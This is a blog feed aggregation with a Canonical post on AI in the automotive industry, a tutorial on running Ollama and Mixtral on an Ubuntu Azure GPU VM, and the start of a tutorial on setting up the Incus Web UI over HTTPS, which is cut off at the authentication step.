Planet Debian Derivativeshttps://planet.debian.org/deriv/atom.xml2024-03-29T11:46:36+00:00http://intertwingly.net/code/venus/Ubuntu Blog: AI and automotive: navigating the roads of tomorrowhttps://ubuntu.com//blog/ai-and-automotive-navigating-the-roads-of-tomorrow2024-03-29T08:00:00+00:00<p>I had the pleasure to be invited by Canonical’s AI/ML Product Manager, Andreea Munteanu, to one of the recent episodes of the Canonical AI/ML podcast. As an enthusiast of automotive and technology with a background in software, I was very eager to share my insights into the influence of artificial intelligence (AI) in the automotive industry. I have a strong belief that the intersection of AI and cars represents a pivotal point where innovation meets practical implementation, and leads to safer, more efficient and more user-friendly cars. </p>
<p>In the episode, several key issues in the use of AI in cars and automotive in general came up. It’s not just the use of AI that we should be thinking about, but a whole range of safety, ethics, and privacy concerns that can eclipse simple technical challenges. This underscores the importance of considering the broader societal impacts and ethical implications of integrating AI into automotive technologies.</p>
<p>This blog explores the key takeaways from the engaging conversation we’ve had, diving into the present and future implications of AI in the world of automobiles. We talked about a lot in the half-hour discussion, but a stand-out moment for me was when we spoke about the impact AI implementation has on costs. I’ll get more into why I thought this was the most important part of our discussion in a bit, but for now you can listen to the entire conversation yourself in the <a href="https://open.spotify.com/episode/19y7OK5j8rCek3pP9BXkQN?si=d0cd185d08f1493c">podcast episode</a>.</p>
<h1 class="wp-block-heading">AI is everywhere in automotive</h1>
<p>AI is already embedded in every aspect of the automotive sector. This key role is not just limited to autonomous vehicles: AI is integral to manufacturing processes, predictive maintenance, and supply chain management. In almost every part of the automobiles – whether it’s conceptualising and building cars, driving them, or monitoring their performance throughout their lifecycle – AI is critical.</p>
<h2 class="wp-block-heading">Safety considerations</h2>
<p>Cars driving themselves around makes people very nervous, especially when algorithms are tasked with making intricate split-second decisions that boil down to “don’t swerve into oncoming traffic”. It’s no surprise that safety is the paramount factor in vehicle AI conversations. Therefore, it is imperative to address the safety concerns associated with the integration of AI in automotive technology.</p>
<p><em>“Would you protect the driver and the vehicle occupants versus all the surrounding pedestrians? In some cases, the vehicle will have to choose”*</em><em><br /></em><a href="mailto:bertrand.boisseau@canonical.com"><em>Bertrand Boisseau</em></a></p>
<p>It’s a troubling ethical concern: do machines have a right to make decisions about human life, and what are the limits to that decision-making process? AI and autonomous vehicle engineers have their work cut out for them, as these decisions are incredibly complex and happen at the speed of life. When a glitch happens on your desktop, it’s not so bad because you’re not travelling at 100 km/hr through 2-lane traffic with oncoming trucks and pedestrians on every side.</p>
<figure class="wp-block-image">
<div class="lazyload">
<noscript>
<img alt="" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_720/https://lh7-us.googleusercontent.com/docsz/AD_4nXeS1j6n0ATx-Je6keXk_AHjzuXerX7-KCnkXFeuMnxXGrLI5wUCrCOac6uZ1nUG9fwqmVmieBaP9rnRgMV4CsNfC95a9hF45PNTsYsOs_mntc5U1Sfx6F8jLm8bqcVkFQZvfBR3_nYjts_ja21vRg0?key=4hpdvfNhTZr1iFABdcjlDA" width="720" />
</noscript>
</div>
</figure>
<p>While these challenges are significant and lead to a lot of uncertainty about whether it is safe to let Autonomous Driving (AD) vehicles drive around at the maximum speed limit, we should pause for a second to reflect on the extreme and ongoing testing and retesting that they undergo. </p>
<p>Driverless cars often make headlines when accidents happen. But it’s important to remember that accidents are part of driving, whether it’s with a human or autonomous tech. In reality, driving carries risks, and you’re likely to get in a car accident in your lifetime. So, while one accident might spark concerns, it’s crucial to see it in the bigger picture of transportation safety. </p>
<p>Also, a study comparing human ride-hail drivers and self-driving cars in San Francisco revealed that human drivers are more likely to crash, cause crashes, and injure others than autonomous vehicles. <a href="https://www.warpnews.org/transportation/self-driving-cars-are-safer-than-human-drivers-study-shows/">Human drivers had a crash rate of 50.5 crashes per million miles, while self-driving cars had a lower rate of 23 crashes per million miles</a>.</p>
<p>Additionally, the development of robust fail-safe mechanisms and redundant systems can serve as safeguards against potential algorithmic errors or malfunctions. Furthermore, ongoing collaboration between industry stakeholders, regulatory bodies, and research institutions fosters the establishment of comprehensive safety standards and guidelines for the integration of AI in automotive technology. </p>
<p>By prioritising safety considerations and adopting a multi-faceted approach encompassing technological innovation, rigorous testing, and regulatory oversight, the automotive industry can effectively address the safety challenges associated with AI integration, paving the way for safer and reliable autonomous driving systems.</p>
<h2 class="wp-block-heading">Diverse applications beyond driving</h2>
<p>While self-driving cars often take centre stage, AI solves a broader spectrum of problems for the automotive industry: optimising manufacturing processes; predictive maintenance for parts replacement; and enhancing supply chain management efficiency, to name a few. It will also transform the in-car experience with advanced voice recognition and personalised assistance.</p>
<p><em>“I do believe that having advanced personal assistant will be noticeable for the user. Once you start putting voice recognition in there, it can become, I think, very useful.”*</em><br /><a href="mailto:bertrand.boisseau@canonical.com"><em>Bertrand Boisseau</em></a></p>
<h1 class="wp-block-heading">Challenges and concerns</h1>
<p>On the podcast, we mention that safety is the most obvious concern when it comes to the use of AI in cars, but there are even greater challenges and concerns that developer automotive industry figures should be thinking about. These include privacy issues, the role of regulation in the use of AI, public trust in AI systems, job displacement fears, and the substantial costs associated with running AI/ML models, both in terms of processing power and energy consumption. </p>
<p><em>“You want to make sure that whatever is sent to the training models still complies with data privacy concerns: how do you collect data, how do you share vehicle data -which is usually private data-, how do you train these models?”*</em><em><br /></em><a href="mailto:bertrand.boisseau@canonical.com"><em>Bertrand Boisseau</em></a></p>
<p>When it comes to training machine learning models for autonomous vehicles, maintaining data privacy is crucial. We need to be mindful of how we collect and share vehicle data, ensuring it aligns with privacy concerns. It’s vital to gather data ethically and responsibly, while also validating its quality to prevent biases and inaccuracies. After all, if we feed the models with flawed data (from bad drivers, for example), we risk compromising their performance and safety. So, robust data validation processes are essential to ensure the effectiveness and reliability of autonomous vehicle technology.</p>
<h2 class="wp-block-heading">The evolution of jobs</h2>
<p>As AI evolves, so too do the nature of jobs in the automotive industry. Take developers as an example: as AI gains a stronger foothold in automotive development, our roles will transform from manually coding algorithms to focusing on simulating and validating AI models. </p>
<p><em>“I don’t agree with the idea of having job displacement in any way, but I do think that there is going to be a shift [in] the market, and there is a clear skill gap or understanding gap.”*</em><br /><a href="mailto:andreea.munteanu@canonical.com">Andreea Munteanu</a></p>
<p>The industry faces a growing need for individuals with expertise in both AI and automotive engineering, bridging the gap between technology and traditional automotive skills.</p>
<p>However, it’s also crucial to acknowledge the widespread concerns about the potential impact of autonomous vehicles on various job sectors within transportation, including taxi drivers, delivery drivers, truck drivers, valets, and e-hailing service contractors. While autonomous technology is advancing rapidly, broad legislation still typically mandates the presence of a human driver to take over the wheel if necessary, meaning fully human-free cars aren’t imminent.</p>
<h2 class="wp-block-heading">The use of open source</h2>
<p>Open source software will play a key role in the automotive sector. Open source software presents indispensable advantages such as unparalleled transparency, enabling thorough inspection and auditability of the codebase. </p>
<p>“Open source software in general and even [especially] in AI/ML would be the wiser choice in most cases.”*<br /><a href="mailto:bertrand.boisseau@canonical.com">Bertrand Boisseau</a></p>
<p>This transparency not only fosters trust and reliability but also empowers developers to identify and rectify potential issues swiftly, ensuring the highest standards of quality and security. Additionally, going with closed source might mean that Original Equipment Manufacturers (OEMs), or even the customers, have to pay extra fees per year just for licences. Imagine having a “smarter” car that becomes useless if a licence lapses or expires. Open source cuts down on these costs since you’re not constrained by licences, making software cheaper to create, keep up, and expand. Fewer closed source licences mean less complexity in the user experience.</p>
<p>The adoption of open-source models, tools, and frameworks is likely to grow, especially as companies aim to balance innovation and security.</p>
<h2 class="wp-block-heading">Data privacy</h2>
<p>As AI becomes increasingly integrated into the automotive industry, ensuring robust data privacy measures is paramount. The vast amounts of data generated by connected vehicles, ranging from driver behaviour to location information, raise significant privacy concerns. </p>
<p>It’s essential to implement strict and clear data protection protocols to safeguard sensitive information from unauthorised access or misuse. Additionally, transparent data collection practices and clear consent mechanisms must be established to ensure that users have control over their data. </p>
<figure class="wp-block-image">
<div class="lazyload">
<noscript>
<img alt="" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_720/https://lh7-us.googleusercontent.com/docsz/AD_4nXevsAtPZk4v8bjvuKQ_eMf7Csv9jHy_yGo77fVrdZ_RfHK2RpbyyoiXR8IyA63OuX8hRh79nVvj4UDlo_Zz4Nbo4dQG_3PuOOK5rl9CRuRdb3L3IyyvXuYQ5ZLRziPBb25Tz1wbt2CumreX-hj_9X8?key=4hpdvfNhTZr1iFABdcjlDA" width="720" />
</noscript>
</div>
</figure>
<p>Failure to address data privacy issues adequately not only risks violating privacy regulations but also erodes consumer trust, hindering widespread adoption of AI-driven automotive technologies. With the implementation of EU policies such as GDPR, fines can be as high as 10 million euros or up to 2% of the company’s entire global turnover of the preceding fiscal year (whichever is higher), further emphasising the importance of robust data privacy measures.</p>
<h2 class="wp-block-heading">AI can reduce costs in automotive</h2>
<p>Cost considerations are another crucial aspect of integrating AI into the automotive industry. While AI technologies hold immense potential to optimise operations, enhance safety, and improve the driving experience, they often come with significant upfront and ongoing costs. </p>
<p>The automotive industry is also fiercely focused on cost optimisation: cars that are more expensive are a severe risk for sales, especially in saturated markets. What good is AI and all the hardware and infrastructure it will need if it just leads to cars that their usual buyers can no longer afford? </p>
<p>Additionally, ensuring compatibility with existing systems and regulatory compliance may incur other expenses. Moreover, there are ongoing costs associated with maintaining and updating AI systems, as well as training personnel to effectively use and manage these technologies. </p>
<p>However, despite the initial investment, the potential long-term benefits, such as increased efficiency, reduced accidents, and improved customer satisfaction, can outweigh the costs over time. Therefore, while cost is a critical factor to consider, automotive companies must carefully weigh the upfront investment against the potential long-term returns and strategic advantages offered by AI integration.</p>
<h2 class="wp-block-heading">Regulations: the wild west won’t stay wild forever</h2>
<p><a href="https://ubuntu.com/blog/functional-safety-in-automotive-contributing-to-iso-26262-and-iso-21434-standards">Navigating regulatory frameworks</a> generally presents significant challenges. This is already true for the integration of AI into the automotive industry. Regulators are often slow to react to the rapid pace of technological advancements, resulting in a lag between the emergence of new AI-driven automotive technologies and the establishment of appropriate regulations. This delay can create uncertainty and hinder innovation within the industry as companies navigate ambiguous regulatory landscapes. </p>
<p>However, once regulatory wheels are set in motion, they can hit like a truck, with stringent requirements and compliance measures impacting the entire automotive ecosystem. The sudden imposition of regulations can disrupt ongoing projects, necessitate costly adjustments, and delay the deployment of AI technologies. </p>
<p>Therefore, automotive companies must remain vigilant and proactive in engaging with regulators, advocating for clear and forward-thinking regulatory frameworks that balance innovation with safety and compliance. By fostering collaboration and dialogue between industry stakeholders and regulators, the automotive industry can navigate regulatory challenges more effectively and ensure the responsible and sustainable integration of AI technologies.</p>
<h2 class="wp-block-heading">Reconciling AI and sustainability</h2>
<p>Sustainability and energy consumption are crucial topics of debate in the automotive industry, especially concerning the integration of AI technologies. Data centres, which are essential for processing the vast amounts of data generated by AI-driven systems, consume substantial amounts of energy. The energy usage of a single data centre can be equivalent to that of a small town, highlighting the significant environmental impact associated with AI infrastructure.</p>
<p><em>“If you need processing power, you need energy. The big [AI/ML] players</em> <em>have also been saying that we will need to build nuclear power plants to run all the requests.”*</em><br /><a href="mailto:bertrand.boisseau@canonical.com"><em>Bertrand Boisseau</em></a></p>
<figure class="wp-block-image size-full">
<div class="lazyload">
<noscript>
<img alt="" height="756" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_1344,h_756/https://ubuntu.com/wp-content/uploads/075c/3.jpg" width="1344" />
</noscript>
</div>
</figure>
<p>Similarly, badly optimised, individual autonomous cars, with their sophisticated sensor systems and computational requirements, might also <a href="https://www.businessinsider.com/chatgpt-uses-17-thousand-times-more-electricity-than-us-household-2024-3?r=US&IR=T">consume considerable energy</a> during operation.</p>
<p>As the automotive industry embraces AI, it must address the sustainability implications of increased energy consumption and explore strategies to minimise environmental impact, such as optimising algorithms for efficiency, utilising renewable energy sources, and implementing energy-saving technologies.</p>
<h2 class="wp-block-heading">Addressing criticisms of automotive automation</h2>
<p>Automation in the automotive industry presents significant potential, yet it’s essential to address ongoing discussions surrounding the broader concept of automation, particularly in social media and consumer circles. Questions arise, challenging the value of autonomous driving and whether every aspect of a car’s operation needs to be automated. While these debates hold merit, they often overlook the broader implications and benefits that automation can bring.</p>
<p>Arguments against automation often highlight concerns regarding the potential loss of manual driving skills and the ability to react to unforeseen situations beyond the scope of automated systems. However, it’s crucial to consider that historical transitions in automotive technology, such as the shift from manual to automatic transmission or the adoption of adaptive cruise control, have not resulted in increased accidents — quite the opposite, in fact. On top of that, the advancement of automation extends beyond driverless vehicles alone, encompassing a multitude of frameworks, optimisations, and breakthroughs with far-reaching impacts.</p>
<p>Drawing parallels to other technological achievements, such as the space program, sheds light on the extensive benefits that arise from ambitious projects despite initial scepticism. Much like criticisms were raised against space exploration, which questioned its necessity or deemed it a misallocation of resources, the collective efforts in the automotive industry toward automation yield a number of innovations and enhancements. These advancements not only streamline operation and maintenance but also significantly enhance safety for drivers and road users alike. Therefore, while discussions surrounding automation provoke diverse perspectives, embracing its potential fosters progress and innovation within the automotive landscape, and beyond.</p>
<h1 class="wp-block-heading">The future of AI in automotive</h1>
<p>In the future, AI in the automotive industry will certainly be widespread; but the application of AI will dominate more specific use cases, such as autonomous driving systems, personal assistants or predictive maintenance. The reasons for this are quite simple: the data processing and warehousing for each automated vehicle become difficult to design and expensive to run, especially when the financial returns on AI products and their long-term financial sustainability are still unproven. There are still strong challenges when it comes to generating revenue from AI investments, particularly in the automotive realm, where return on investment and sustainable business models are still evolving.</p>
<p>I found our podcast conversation on AI in the automotive industry incredibly engaging, especially when we delved into the potential impact on safety and driving experiences. It’s fascinating to envision how AI will revolutionise not just the way we drive, but also how vehicles are manufactured and maintained. As AI paves the roads of tomorrow, the integration of AI into the automotive industry promises a transformative journey.</p>
<p>As a passionate car enthusiast, I think we’re headed towards a new era of innovation. AI will be in our cars, homes, jobs, buses, and perhaps even our law-making offices. As it grows and evolves, it’ll be even more important to keep track of its progression and adoption – which is why I’m glad that podcasts like ours exist. If you want to stay ahead of AI/ML and GenAI in the automotive industry – or indeed, any industry – and watch its interplay with open source applications, follow the <a href="https://open.spotify.com/show/0vXcVgTHKUeJZx5YYYgdiX">Ubuntu AI Podcasts by Canonical</a>.</p>
<p>*quotations edited for clarity and brevity</p>
<p><a href="https://open.spotify.com/episode/19y7OK5j8rCek3pP9BXkQN?si=d0cd185d08f1493c">Listen to the podcast episode</a></p>
<p><a href="https://ubuntu.com/automotive#get-in-touch">Contact Us</a></p>
<h2 class="wp-block-heading"><strong>Further reading</strong></h2>
<figure class="wp-block-image">
<div class="lazyload">
<noscript>
<img alt="" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_720/https://lh7-us.googleusercontent.com/docsz/AD_4nXedj4_9yZLavfNNv3GzY7VMt0DgQJ3JnjBkp9ZaTn9klMOdUOa7L6JuWsen466KvQmqlHIMLXrOryGK4GRaIas0kMpKd6P2_liXDkZm4QLoRngNlMFGeBTZfIG-Hy0IY2jpNob5XbKV5Aen_CHrRjY?key=4hpdvfNhTZr1iFABdcjlDA" width="720" />
</noscript>
</div>
</figure>
<p><a href="https://ubuntu.com/engage/software-defined-vehicles-whitepaper?utm_medium=blog&utm_campaign=7014K000000UhzE">Want to learn more about Software Defined Vehicles? Download our guide!</a></p>
<p><a href="https://ubuntu.com/blog/elektrobit-and-canonical-announce-eb-corbos-linux-built-on-ubuntu">Learn about the next-generation automotive operating system: EB corbos Linux – built on Ubuntu</a></p>
<p><a href="https://ubuntu.com/blog/how-to-choose-an-os-for-software-development-in-automotive">How to choose an OS for software development in automotive</a></p>Ubuntu developershttp://planet.ubuntu.com/Ubuntu Blog: Deploying Open Language Models on Ubuntuhttps://ubuntu.com//blog/deploying-open-language-models-on-ubuntu2024-03-28T22:18:41+00:00<p>This blog post explores the technical and strategic benefits of deploying open-source AI models on Ubuntu. We’ll highlight why it makes sense to use Ubuntu with open-source AI models, and outline the deployment process on Azure.</p>
<p><em>Authored by Gauthier Jolly, Software Engineer, CPC, and Jehudi Castro-Sierra, Public Cloud Alliance Director, both from Canonical.</em></p>
<h2 class="wp-block-heading">Why Ubuntu for Open-Source AI?</h2>
<ul>
<li><strong>Open Philosophy</strong>: Ubuntu’s open-source nature aligns seamlessly with the principles of open-source AI models, fostering collaboration and accessibility.</li>
<li><strong>Seamless Integration</strong>: Deploying open-source AI is smooth on Ubuntu, thanks to its robust support for AI libraries and tools.</li>
<li><strong>Community</strong>: Ubuntu’s large community provides valuable resources and knowledge-sharing for AI development.</li>
</ul>
<h2 class="wp-block-heading">The Role of Ubuntu Pro</h2>
<p>Ubuntu Pro elevates the security and compliance aspects of deploying AI models, offering extended security maintenance, comprehensive patching, and automated compliance features that are vital for enterprise-grade applications. Its integration with Confidential VMs on Azure enhances the protection of sensitive data and model integrity, making it an indispensable tool for tasks requiring stringent security measures like ML training, inference, and confidential multi-party data analytics.</p>
<h2 class="wp-block-heading">Why use the public cloud for deploying AI models?</h2>
<p>Using a public cloud like Azure gives straightforward access to powerful GPUs and <a href="https://ubuntu.com/blog/preview-confidential-ai-azure">Confidential Compute capabilities</a>, essential for intensive AI tasks. These features significantly reduce the time and complexity involved in setting up and running AI models, without compromising on security and privacy. Although some may opt for on-prem deployment due to specific requirements, Azure’s scalable and secure environment offers a compelling argument for cloud-based deployments.</p>
<h2 class="wp-block-heading">Provisioning and Configuration</h2>
<p>We are going to explore using open models on Azure by creating an instance with Ubuntu, installing NVIDIA drivers for GPU support, and setting up Ollama for running the models. The process is technical, involving CLI commands for creating the resource group, VM, and configuring NVIDIA drivers. Ollama, the chosen tool for running models like Mixtral, is best installed using Snap for a hassle-free experience, encapsulating dependencies and simplifying updates.</p>
<h3 class="wp-block-heading">Provision an Azure VM</h3>
<p>Begin by creating a resource group and then a VM with the Ubuntu image using the Azure CLI.</p>
<div class="wp-block-group is-layout-constrained wp-block-group-is-layout-constrained"><div class="wp-block-group__inner-container">
<pre class="wp-block-preformatted">az group create --location westus --resource-group ml-workload
az vm create \
--resource-group ml-workload \
--name jammy \
--image Ubuntu2204 \
--generate-ssh-keys \
--size Standard_NC4as_T4_v3 \
--admin-username ubuntu --license-type UBUNTU_PRO
</pre>
<p>Note the publicIpAddress from the output – you’ll need it to SSH into the VM.</p>
</div></div>
<h3 class="wp-block-heading">Install Nvidia Drivers (GPU Support)</h3>
<p>For GPU capabilities, install NVIDIA drivers using Ubuntu’s package management system. Restart the system after installation.</p>
<pre class="wp-block-preformatted">sudo apt update -y
sudo apt full-upgrade -y
sudo apt install -y ubuntu-drivers-common
sudo ubuntu-drivers install
sudo systemctl reboot</pre>
<p><strong>Important</strong>: Standard NVIDIA drivers don’t support vGPUs (fractional GPUs). See instructions on the <a href="https://learn.microsoft.com/en-us/azure/virtual-machines/linux/n-series-driver-setup#install-grid-drivers-on-nv-or-nvv3-series-vms">Azure site</a> for installing GRID drivers, which might involve building an unsigned kernel module (which may be incompatible with Secure Boot).</p>
<h3 class="wp-block-heading">Deploying Ollama with Snap</h3>
<p>Snap simplifies the installation of Ollama and its dependencies, ensuring compatibility and streamlined updates. The –beta flag allows you to access the latest features and versions, which might still be under development</p>
<pre class="wp-block-preformatted">sudo snap install --beta ollama</pre>
<h3 class="wp-block-heading">Configuration</h3>
<p>Configure Ollama to use the ephemeral disk</p>
<pre class="wp-block-preformatted">sudo mkdir /mnt/models
sudo snap connect ollama:removable-media # to allow the snap to reach /mnt
sudo snap set ollama models=/mnt/models</pre>
<h3 class="wp-block-heading">Installing Mixtral</h3>
<p>At this point, you can run one of the open models available out of the box, like mixtral or llama2. If you have a fine-tuned version of these models (a process that involves further training on a specific dataset), you can run those as well.</p>
<pre class="wp-block-preformatted">ollama run mixtral</pre>
<p>The first run might take a while to download the model.</p>
<p>Now you can use the model through the console interface:<br />
</p><div class="lazyload">
<noscript>
<img alt="" height="241" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_917,h_241/https://lh7-us.googleusercontent.com/hA8UbKlBIWYzwuHR9PlWYA8sg32PBmRar_lFi6zcAfqwXB1f2jApIQ-ty97JXJxVBDzz9opk0_hZB1bVMfzCQFXLBNyFUUy9BNjGGTZjlCAnBNilGUK67zPgXqBpFGM9J1zFu4pYARGBv74DUU2jCY4" width="917" />
</noscript>
</div>
<p></p>
<h3 class="wp-block-heading">Installing a UI</h3>
<p>This step is optional, but provides a UI via your web browser.</p>
<pre class="wp-block-preformatted">sudo snap install --beta open-webui</pre>
<h3 class="wp-block-heading">Access the web UI securely</h3>
<p>To quickly access the UI without open ports in the Azure security group, you can create an SSH tunnel to your VM using the following command:</p>
<pre class="wp-block-preformatted">ssh -L 8080:localhost:8080 ubuntu@${IP_ADDR}</pre>
<p>Go to <a href="http://localhost:8080">http://localhost:8080</a> in your web browser on your local machine (the command above tunnels the traffic from your localhost to the instance on Azure).:</p>
<figure class="wp-block-image">
<div class="lazyload">
<noscript>
<img alt="" height="333" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_1098,h_333/https://ubuntu.com/wp-content/uploads/a48a/image.png" width="1098" />
</noscript>
</div>
</figure>
<p>In case you want to make this service public, follow this <a href="https://learn.microsoft.com/en-us/azure/virtual-network/application-security-groups">documentation</a>.</p>
<h3 class="wp-block-heading">Verify GPU usage</h3>
<pre class="wp-block-preformatted">sudo watch -n2 nvidia-smi</pre>
<p>Check that the ollama process is using the GPU, you should see something like this:</p>
<pre class="wp-block-preformatted">+---------------------------------------------------------------------------+
| Processes: |
| GPU GI CI PID Type Process name GPU Memory |
| ID ID Usage |
|===========================================================================|
| 0 N/A N/A 1063 C /snap/ollama/13/bin/ollama 4882MiB |
+---------------------------------------------------------------------------+
</pre>
<h2 class="wp-block-heading">Complementary and Alternative Solutions</h2>
<ul>
<li><a href="https://charmed-kubeflow.io/">Charmed Kubeflow</a>: Explore this solution for end-to-end MLOps (Machine Learning Operations), providing a streamlined platform to manage every stage of the machine learning lifecycle. It’s particularly well-suited for complex or large-scale AI deployments.</li>
<li>Azure AI Studio: Provides ease of use for those seeking less customization.</li>
</ul>
<h2 class="wp-block-heading">Conclusion</h2>
<p>Ubuntu’s open-source foundation and robust ecosystem make it a compelling choice for deploying open-source AI models. When combined with Azure’s GPU capabilities and Confidential Compute features, you gain a flexible, secure, and performant AI solution.</p>Ubuntu developershttp://planet.ubuntu.com/Simos Xenitellis: How to install and setup the Incus Web UIhttps://blog.simos.info/?p=467592024-03-28T22:16:39+00:00<p><a href="https://linuxcontainers.org/incus/">Incus</a> is a manager for <strong><em>virtual machines (VM)</em></strong> and <strong><em>system containers</em></strong>. There is also <a href="https://discuss.linuxcontainers.org/">an Incus support forum</a>.</p>
<p>Typically you would use the <code>incus</code> command-line interface (CLI) client to get access to the Incus manager and perform the tasks for the full life-cycle of the virtual machines and system containers. </p>
<p>In this post we see how to install and setup the Incus Web UI. Just like the <code>incus</code> CLI tool that gets access to the REST API of the Incus manager (through a Unix socket or HTTPS), the Incus Web UI does the same over HTTPS. I assume that you have already installed and setup Incus.</p>
<h2 class="simpletoc-title">Table of Contents</h2>
<ul class="simpletoc-list">
<li><a href="https://blog.simos.info/category/planet-ubuntu/feed/?mrss=off#installing-the-incus-web-ui-package">Installing the Incus Web UI package</a>
</li>
<li><a href="https://blog.simos.info/category/planet-ubuntu/feed/?mrss=off#preparing-incus-to-serve-the-web-ui">Preparing Incus to serve the Web UI</a>
</li>
<li><a href="https://blog.simos.info/category/planet-ubuntu/feed/?mrss=off#getting-the-browser-to-authenticate-to-the-server">Getting the browser to authenticate to the server</a>
</li>
<li><a href="https://blog.simos.info/category/planet-ubuntu/feed/?mrss=off#using-the-incus-ui">Using the Incus UI</a>
</li>
<li><a href="https://blog.simos.info/category/planet-ubuntu/feed/?mrss=off#conclusion">Conclusion</a>
</li>
<li><a href="https://blog.simos.info/category/planet-ubuntu/feed/?mrss=off#tips-and-tricks">Tips and Tricks</a>
<ul><li>
<a href="https://blog.simos.info/category/planet-ubuntu/feed/?mrss=off#how-to-make-the-incus-port-accessible-to-localhost-only">How to make the Incus port accessible to localhost only</a>
</li>
<li><a href="https://blog.simos.info/category/planet-ubuntu/feed/?mrss=off#whats-in-incusuicrt-and-incusuipfx">What’s in incus-ui.crt and incus-ui.pfx?</a>
</li>
</ul>
</li><li><a href="https://blog.simos.info/category/planet-ubuntu/feed/?mrss=off#troubleshooting">Troubleshooting</a>
<ul><li>
<a href="https://blog.simos.info/category/planet-ubuntu/feed/?mrss=off#error-unable-to-connect">Error: Unable to connect</a>
</li>
<li><a href="https://blog.simos.info/category/planet-ubuntu/feed/?mrss=off#error-client-sent-an-http-request-to-an-https-server">Error: Client sent an HTTP request to an HTTPS server</a>
</li>
<li><a href="https://blog.simos.info/category/planet-ubuntu/feed/?mrss=off#warning-potential-security-risk-ahead">Warning: Potential Security Risk Ahead</a>
</li>
</ul>
</li></ul>
<h2 class="wp-block-heading" id="installing-the-incus-web-ui-package">Installing the Incus Web UI package</h2>
<p>The Incus Web UI package is <code>incus-ui-canonical</code>. We install it. By installing the package, we can enable Incus to serve the necessary Web pages (from <code>/opt/incus/ui</code>) so that we can connect with our browser and manage Incus itself. </p>
<pre class="wp-block-code"><code><kbd>sudo apt install -y incus-ui-canonical</kbd></code></pre>
<h2 class="wp-block-heading" id="preparing-incus-to-serve-the-web-ui">Preparing Incus to serve the Web UI</h2>
<p>By default Incus is not <em>listening</em> to a Web port so that we can access directly through the browser. <a href="https://linuxcontainers.org/incus/docs/main/howto/server_expose/">We need to enable first Incus to activate access to the Web browser.</a> By default there is no configuration with <code>incus config show</code>.</p>
<pre class="wp-block-code"><code>debian@myincus:~$ <kbd>incus config show </kbd>
config: {}
debian@myincus:~$ </code></pre>
<p>We activate the Incus Web server, selecting the port number 8443. You are free to select another one, if you need to. We set <code>core.https_address</code> to <code>:8443</code>. This information appears in the <code>incus config</code> output.</p>
<pre class="wp-block-code"><code>debian@myincus:~$ <kbd>incus config set core.https_address :8443</kbd>
debian@myincus:~$ <kbd>incus config show </kbd>
config:
core.https_address: :8443
debian@myincus:~$ </code></pre>
<p>Let’s verify that Incus is now listening to port 8443. Yes, it does. On all interfaces (because of the <code>*</code>).</p>
<pre class="wp-block-code"><code>debian@myincus:~$ <kbd>sudo apt install -y lsof</kbd>
...
debian@myincus:~$ <kbd>sudo lsof -i :8443</kbd>
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
incusd 8338 root 8u IPv6 29751 0t0 TCP *:8443 (LISTEN)
debian@myincus:~$ </code></pre>
<p>This is HTTPS, where are the certificate and the server key (private key)?</p>
<pre class="wp-block-code"><code>debian@myincus:~$ <kbd>sudo ls -l /var/lib/incus/server.key /var/lib/incus/server.crt</kbd>
-rw-r--r-- 1 root root 753 Mar 28 18:54 /var/lib/incus/server.crt
-rw------- 1 root root 288 Mar 28 18:54 /var/lib/incus/server.key
debian@myincus:~$ <kbd>sudo openssl x509 -in /var/lib/incus/server.crt -text -noout</kbd>
Certificate:
Data:
Version: 3 (0x2)
Serial Number:
22:05:f1:14:f2:82:43:68:44:5e:1c:42:4c:28:5b:5c
Signature Algorithm: ecdsa-with-SHA384
Issuer: O = Linux Containers, CN = root@myincus
Validity
Not Before: Mar 28 18:54:17 2024 GMT
Not After : Mar 26 18:54:17 2034 GMT
Subject: O = Linux Containers, CN = root@myincus
Subject Public Key Info:
Public Key Algorithm: id-ecPublicKey
Public-Key: (384 bit)
pub:
04:fb:cd:b6:b2:25:55:68:a5:33:75:48:4c:b0:7a:
2f:e9:c0:16:af:6f:b2:36:f9:19:6e:b0:86:bf:d1:
9f:07:16:b1:26:8b:75:36:f2:fc:02:38:c7:fa:25:
39:01:6c:bb:48:a9:4f:57:0d:af:e1:0f:a3:cf:b1:
7c:a2:d9:46:77:e7:94:c7:00:1a:d0:5f:5f:93:d8:
11:39:8d:16:0e:d0:62:98:81:93:da:ec:b8:70:24:
f2:c4:da:91:0f:f8:8e
ASN1 OID: secp384r1
NIST CURVE: P-384
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Alternative Name:
DNS:myincus, IP Address:127.0.0.1, IP Address:0:0:0:0:0:0:0:1
Signature Algorithm: ecdsa-with-SHA384
Signature Value:
30:64:02:30:15:f4:fa:7b:d6:52:79:d4:c9:27:b9:d6:6c:90:
f7:0e:13:83:15:ac:af:cd:c5:f2:48:08:99:7f:7b:94:55:06:
81:95:80:5f:0a:21:17:82:61:ac:5a:b6:5f:b8:49:b3:02:30:
62:a3:92:66:da:ce:7c:01:49:7e:38:16:c6:16:b3:cb:aa:3d:
1d:3f:63:12:93:e8:a1:0b:55:f0:80:99:d5:80:8a:a3:a6:2e:
3d:68:90:a6:dc:55:29:0b:36:80:36:72
debian@myincus:~$</code></pre>
<p>Note that this is a self-signed certificate. Chrome, Firefox and other browsers will complain; you can still accept to continue but it will show a broken padlock at the address bar. If you wish, you can replace these with proper certificates so that the padlock is intact. To do so, once you replace the server key and the server certificate with actual values, restart Incus. If, however, you are running an Incus cluster, you must use <code>lxc cluster update-certificate</code> instead to update them. Note that a common alternative to dealing with Incus certificates, is to use a reverse-proxy; you get the reverse-proxy to use a proper certificate and leave Incus as is.</p>
<p>At this point Incus is configured. We can continue with the next step where we get the client (our browser) to be authenticated to the server. </p>
<h2 class="wp-block-heading" id="getting-the-browser-to-authenticate-to-the-server">Getting the browser to authenticate to the server</h2>
